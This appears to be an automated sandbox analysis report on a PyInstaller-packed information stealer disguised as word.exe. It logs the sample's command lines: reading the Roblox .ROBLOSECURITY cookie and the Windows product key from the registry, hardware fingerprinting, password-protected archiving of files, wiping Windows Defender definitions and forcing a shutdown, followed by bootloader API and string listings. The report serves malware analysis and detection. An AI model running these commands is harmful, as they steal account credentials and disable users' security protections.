Show Windows behavior

Target ID:	77
Start time:	13:01:27
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	13:01:28
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	13:01:28
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	13:01:28
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	13:01:30
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\word.exe"
Imagebase:	0x6e0000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	13:01:36
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	13:01:36
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	13:01:36
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
Imagebase:	0x7ff71f090000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	13:01:38
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\word.exe"
Imagebase:	0x9b0000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	13:01:38
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	13:01:38
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	13:01:39
Start date:	13/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff753a70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	13:01:40
Start date:	13/10/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff766f80000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	13:01:40
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	13:01:40
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	13:01:40
Start date:	13/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff753a70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	13:01:41
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	13:01:41
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	13:01:41
Start date:	13/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff753a70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	13:01:42
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	13:01:42
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	13:01:43
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	13:01:44
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	13:01:44
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	13:01:44
Start date:	13/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff753a70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	13:01:45
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	13:01:45
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	13:01:45
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	13:02:01
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0xf10000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	13:03:00
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0xa60000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	13:03:30
Start date:	13/10/2024
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	shutdown.exe /f /s /t 0
Imagebase:	0x7ff788b10000
File size:	28'160 bytes
MD5 hash:	F2A4E18DA72BB2C5B21076A5DE382A20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	13:03:30
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	13:04:00
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0xd10000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	111
Start time:	13:05:00
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0xf90000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 00007FF6448789E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878A56

Part of subcall function 00007FF64488A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64488A490

Part of subcall function 00007FF64488871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878AE6
CreateProcessW.KERNELBASE ref: 00007FF644878B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878B28

Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99

RegisterClassW.USER32 ref: 00007FF644878B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878B8B
CreateWindowExW.USER32 ref: 00007FF644878BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C15
PeekMessageW.USER32 ref: 00007FF644878C39
TranslateMessage.USER32 ref: 00007FF644878C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C51
PeekMessageW.USER32 ref: 00007FF644878C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E04
GetExitCodeProcess.KERNELBASE ref: 00007FF644878E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E2F

Strings

Failed to create child process!, xrefs: 00007FF644878B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF644878B95
CreateProcessW, xrefs: 00007FF644878B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF644878B54

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 60f8c9ef815a28acad91f9932d2e75c1c543784b6deed392831a18129e2f2de9
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 60D12F31A0CE868AEB10BF74E8962A937A4FF84B58F404235DE5D93AACDF3DD5558700

Function 00007FF644871000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF644873971
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6448739DE
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF644873E02
pyi-contents-directory, xrefs: 00007FF644873B8D
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF644873A17, 00007FF644873A2F, 00007FF644873A9B
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF644873C61
Failed to start splash screen!, xrefs: 00007FF644873ECC
pyi-python-flag, xrefs: 00007FF644873AD6
MEI, xrefs: 00007FF644873933
Failed to load splash screen resources!, xrefs: 00007FF644873E7D
Failed to convert DLL search path!, xrefs: 00007FF644873DD4
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF644873D12
Py_GIL_DISABLED, xrefs: 00007FF644873AF4
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF644873B32
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF644873EB3
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF644873882, 00007FF6448738AF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF644873BE8
VCRUNTIME140.dll, xrefs: 00007FF644873DA9
Failed to remove temporary directory: %s, xrefs: 00007FF644873FC7
_PYI_SPLASH_IPC, xrefs: 00007FF644873A23, 00007FF644873EED
bye-runtime-tmpdir, xrefs: 00007FF644873B68
pyi-disable-windowed-traceback, xrefs: 00007FF644873BB2
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF644873A0B, 00007FF644873CD4, 00007FF644873F63
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF644873D35
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF644873E9E
_PYI_ARCHIVE_FILE, xrefs: 00007FF6448738D2, 00007FF6448739FF
pkg, xrefs: 00007FF6448739BE
Could not create temporary directory!, xrefs: 00007FF644873CBF

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 674bcc60670d672aff4ed365146476eca55c393db1b0a501f98576d5e66456e0
Instruction ID: 0b21d57aca241b12cceed5b878a980193b2330edbd7d19641619f60746a22517
Opcode Fuzzy Hash: 674bcc60670d672aff4ed365146476eca55c393db1b0a501f98576d5e66456e0
Instruction Fuzzy Hash: BE328D22F0CA8299FA15FB2098E73B96651AF95780F844032DE5DC36DEEF2DE554C302

Function 00007FF644896964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448966D9
Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644896757
Part of subcall function 00007FF644896698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448967A8

CreateFileW.KERNELBASE ref: 00007FF644896A6A
CreateFileW.KERNEL32 ref: 00007FF644896ABA
GetLastError.KERNEL32 ref: 00007FF644896AEA
GetFileType.KERNELBASE ref: 00007FF644896AFF
GetLastError.KERNEL32 ref: 00007FF644896B09
CloseHandle.KERNEL32 ref: 00007FF644896B3C
CloseHandle.KERNEL32 ref: 00007FF644896C9F
CreateFileW.KERNEL32 ref: 00007FF644896CD4
GetLastError.KERNEL32 ref: 00007FF644896CE3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: dd2a26a26d53b17f2a3778c7fc028f4f761f290a0883d563173c3e4702731931
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 86C1B137B28E4689EB10EF65C4926AC3761F789BA8F015239DE1EA7798DF39D451C300

Function 00007FF6448783C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF64487842B
RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784AE
DeleteFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784CD
FindNextFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784DB
FindClose.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784EC
RemoveDirectoryW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784F5

Strings

%s\*, xrefs: 00007FF6448783F2

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: bdff96ecf19b1bb6f1aff61b75035635b47a24be6078d4aa366f52dcaa5329e0
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 64411021B0CD46D9EA20BB64E8E61BA63A0FB94754F900232EE9DC36DCEF7DD5458740

Function 00007FF644879280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6448792B3
FindClose.KERNELBASE ref: 00007FF6448792C2

Memory Dump Source

